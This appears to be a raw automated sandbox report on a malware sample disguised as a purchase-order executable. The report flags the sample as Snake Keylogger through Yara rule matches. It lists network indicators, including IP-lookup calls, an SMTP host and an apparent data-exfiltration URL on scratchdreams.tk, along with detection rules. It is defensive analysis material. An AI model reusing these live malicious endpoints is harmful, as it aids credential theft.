Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003140000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003163000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: 109__Purchase_Order.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 109__Purchase_Order.exe, 00000000.00000002.1692997195.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: 109__Purchase_Order.exe

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_02F7DC94	0_2_02F7DC94
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_02FF3A88	0_2_02FF3A88
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BA6AC0	0_2_05BA6AC0
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BAD4A8	0_2_05BAD4A8
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BA5478	0_2_05BA5478
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BA5467	0_2_05BA5467
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BAF658	0_2_05BAF658
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BA3118	0_2_05BA3118
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BA3108	0_2_05BA3108
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BAD058	0_2_05BAD058
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BAD8E0	0_2_05BAD8E0
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BA6A9E	0_2_05BA6A9E
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BAFA90	0_2_05BAFA90
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 0_2_05BAFA80	0_2_05BAFA80
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0B388	2_2_02F0B388
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0C1F0	2_2_02F0C1F0
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F06168	2_2_02F06168
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0C7B2	2_2_02F0C7B2
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0C4D0	2_2_02F0C4D0
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0CA92	2_2_02F0CA92
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0FA10	2_2_02F0FA10
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F04B31	2_2_02F04B31
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F068E0	2_2_02F068E0
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F098B8	2_2_02F098B8
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0BF10	2_2_02F0BF10
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0BC32	2_2_02F0BC32
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0EDF0	2_2_02F0EDF0
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0E310	2_2_02F0E310
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0E300	2_2_02F0E300
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F035CA	2_2_02F035CA
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 2_2_02F0B552	2_2_02F0B552

Source: 109__Purchase_Order.exe, 00000000.00000002.1693621275.0000000007740000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 109__Purchase_Order.exe
Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 109__Purchase_Order.exe
Source: 109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 109__Purchase_Order.exe
Source: 109__Purchase_Order.exe, 00000000.00000002.1690702654.00000000031DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 109__Purchase_Order.exe
Source: 109__Purchase_Order.exe, 00000000.00000002.1685326026.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 109__Purchase_Order.exe
Source: 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 109__Purchase_Order.exe
Source: 109__Purchase_Order.exe, 00000002.00000002.4074833804.0000000000FB7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 109__Purchase_Order.exe
Source: 109__Purchase_Order.exe	Binary or memory string: OriginalFilenameENYy.exe: vs 109__Purchase_Order.exe

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Section loaded: dpapi.dll	Jump to behavior

Source: 109__Purchase_Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
